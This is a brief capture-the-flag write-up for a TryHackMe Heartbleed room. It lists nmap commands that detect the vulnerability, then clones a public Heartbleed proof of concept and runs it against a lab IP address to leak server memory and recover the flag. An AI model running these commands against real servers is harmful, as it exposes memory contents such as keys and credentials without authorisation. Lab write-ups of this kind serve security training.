Room Link: https://tryhackme.com/room/heartbleedarrow-up-right
Kali
nmap -A $VICTIM
We can see the site is vulnerable to heartbleed
I had to run the exploit a couple times but eventually I found some interesting info. Most importantly the flag.
Last updated 1 year ago
nmap -p 443 --script ssl-heartbleed $VICTIM
git clone https://github.com/mpgn/heartbleed-PoC.git cd heartbleed-PoC/ python2.7 heartbleed-exploit.py 34.240.174.225